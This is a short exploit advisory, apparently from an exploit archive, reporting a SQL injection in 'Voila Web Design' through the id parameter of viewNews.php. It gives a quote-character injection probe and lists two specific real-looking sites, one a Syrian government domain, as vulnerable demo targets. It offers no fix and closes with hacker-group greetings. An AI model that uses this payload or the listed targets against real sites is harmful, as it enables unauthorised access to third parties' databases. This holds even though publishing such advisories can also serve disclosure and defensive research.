Voila Web Design suffers from a remote SQL injection vulnerability.
dfac022abcd8dd817bf7421286b8b4d64706303c7f00ee95f51ac685ab59e430
# Exploit Title; Voila Web Design SQL Injection Vulnerability
# Date ; 24/6/12
# Author ; 3spi0n
# Script Vendor or Software Link ; http://www.voilasyria.com/
# Category ; Webapps
# Type ; SQL Injection [MySQLi]
# Tested on ; Ubuntu / Win7 / Backtrack
[#] Demo Analyzing ;
http://edpa.gov.sy/forms/news/viewNews.php?id=21' [MySQLi Vuln.]
http://www.qualitysyria.sy/all/viewNews.php?id=61' [MySQLi Vuln.]
[#] Vulnerable Details ;
- MySQLi Vulnerable on sites
Vulnerable File ; viewNews.php?query= [query, variant of index.php file]
Exploit ; viewNews.php?id='
[#] Greetz ;
- Grayhatz Corporation
- My Official Blog, www.Ryuzaki.in
- Facebook.Com/3spi0ne - Twitter.Com/RigidusCO